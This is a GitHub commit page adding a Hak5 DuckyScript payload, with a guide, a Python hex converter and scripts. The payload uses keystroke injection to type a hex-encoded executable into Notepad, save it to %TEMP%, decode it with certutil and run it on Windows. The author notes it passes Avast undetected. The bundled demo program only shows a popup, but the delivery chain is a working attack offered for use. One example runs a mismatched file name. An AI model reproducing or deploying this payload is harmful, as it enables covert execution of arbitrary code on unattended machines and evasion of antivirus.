Skip to content

Commit

Permalink
Merge pull request #347 from aleff-github/patch-64
Browse files Browse the repository at this point in the history
Install And Run Any Arbitrary Executable - No Internet And Root Needed
  • Loading branch information
dallaswinger authored Jan 8, 2024
2 parents 6cf55d1 + 48ffc96 commit bf2dfb7
Show file tree
Hide file tree
Showing 6 changed files with 270 additions and 0 deletions.
Original file line number Diff line number Diff line change
@@ -0,0 +1,125 @@
# Install And Run Any Arbitrary Executable - No Internet And Root Needed

Through this guide you will be able to create executable programs that can be installed via DuckyScript in such a way as to avoid using the Internet altogether. This type of installation can lead to serious damage to machines so do it only if you are fully aware and sure of what you are doing, in this example you will already find the code in hexadecimal but if you want to be sure recompile the executable following the following guide.

Executables have been removed for security reasons.

**Category**: Execution

# Guide to Creating an Executable Program using Python

## Introduction

This guide provides detailed instructions on how to use Python to create an executable program, generate hexadecimal code, and automate the execution of the application trough DuckyScript. Practical example in assets directory.

## Creating the Python Program

To begin, create a Python program that performs the desired functionality. You can use any programming language of your choice, but for this guide, we'll be using Python.

```python
import ctypes

ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
```

## Creating the Executable using PyInstaller

Once the Python program is ready, we can use PyInstaller to create an executable file. PyInstaller converts the Python program into a standalone executable that can be run on any compatible system without requiring Python to be installed.

Install PyInstaller using the following command:

```powershell
pip install pyinstaller
```

To create the executable, run the following command in the terminal:

```powershell
pyinstaller --onefile full/path/to/the/file/example.py
```

Replace `example.py` with the filename of your Python script. The `--onefile` flag ensures that the output is a single executable file. Remember that the executable file can be found within the path `dist/example.exe`.

## Generating Hexadecimal Code

Next, we'll generate the hexadecimal code from the executable file. This step is necessary if you intend to automate the execution of the program.

To generate the `hexadecimal` code, you can use various methods or libraries. In this case I decided to create another program in Python capable of doing this conversion, the partial code is as follows but you can find the entire file in the assets folder.

```python
# Rest of the code...
with open(filename, 'rb') as file:
binary_data = file.read()
hex_code = binascii.hexlify(binary_data).decode()
# ...
```

## Creating a DuckyScript to Automate Execution

To create the payload in DuckyScript you simply add the hexadecimal code inside a STRING command immediately after opening the notepad.

```duckyscript
DEFINE #HEX_CODE <hexadecimal_code>
DELAY 500
GUI r
DELAY 500
STRING notepad.exe
ENTER
DELAY 500
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
ALTSTRING "%TEMP%\script.hex"
```

Replace `<hexadecimal_code>` with the actual hexadecimal code generated in the previous step. I used a combo ALT F and STRING S for save the file using `"%TEMP%\script.hex"` that save it in a `TEMP` directory

## Decoding Hexadecimal Code and Executing the Program
Now, we need to decode the hexadecimal code and execute the program. We can use the `certutil` command to accomplish this.

Once saved the file with a hex extension, run the following command in the Command Prompt:

```powershell
certutil -f -decodeHex "%TEMP%\script.hex" "%TEMP%\script.exe"
```

Replace `script.exe` with the desired output filename for the decoded program.

Finally, run the executable on the computer, or any other compatible device, to open start execution of the program.

These are the steps required to create an executable program with Python, generate the hexadecimal code, and automate its execution. Feel free to modify the instructions to suit your specific needs or programming language preferences.

Happy Hacking!

## Credits

<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
</td>
</tr>
</table>
</div>
Original file line number Diff line number Diff line change
@@ -0,0 +1,77 @@
# Example

Executables have been removed for security reasons.

## File list

- Python code: `example.py`
- Convert to hex script: `convert_to_hex.py`
- Executable file compiled using pyinstaller: `dist/example.exe`
- Hexadecimal code output: `example.hex`
- File compiled from hex code using certutil: `example.exe`

## Procedure

- This Python code create a Windows popup.

```python
import ctypes

ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
```

- Create the executable

```powershell
pyinstaller --onefile C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.py
```

- Create the hex code

```python
import binascii

def convert_to_hex(filename, output_file):
with open(filename, 'rb') as file:
binary_data = file.read()

hex_code = binascii.hexlify(binary_data).decode()

with open(output_file, 'w') as output:
output.write(hex_code)

# Esempio di utilizzo
exe_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'
output_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.hex'
convert_to_hex(exe_filename, output_filename)
```

- Create the DuckyScript payload

```duckyscript
GUI r
DELAY 1000
STRINGLN notepad.exe
DELAY 2000
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
STRINGLN "%TEMP%\example.hex"
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 2000
GUI r
DELAY 500
STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 250
STRINGLN "%TEMP%\pranhex.exe"
```
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
import binascii

def convert_to_hex(filename, output_file):
with open(filename, 'rb') as file:
binary_data = file.read()

hex_code = binascii.hexlify(binary_data).decode()

with open(output_file, 'w') as output:
output.write(hex_code)

# Esempio di utilizzo
exe_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'
output_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.txt'
convert_to_hex(exe_filename, output_filename)
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
here should be present the hex content
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
import ctypes

ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
Original file line number Diff line number Diff line change
@@ -0,0 +1,49 @@
REM ###########################################################################################
REM # |
REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ###########################################################################################


REM Requirements:
REM - Nothing


REM Define here your hexadecimal code
DEFINE #HEX_CODE example


REM Note:
REM - Tested on Windows 11
REM - Running checked but not blocked by Avast antivirus


GUI r
DELAY 1000
STRINGLN notepad.exe
DELAY 2000
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
STRINGLN "%TEMP%\example.hex"
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 2000
GUI r
DELAY 500
STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 250
STRINGLN "%TEMP%\example.exe"

0 comments on commit bf2dfb7

Please sign in to comment.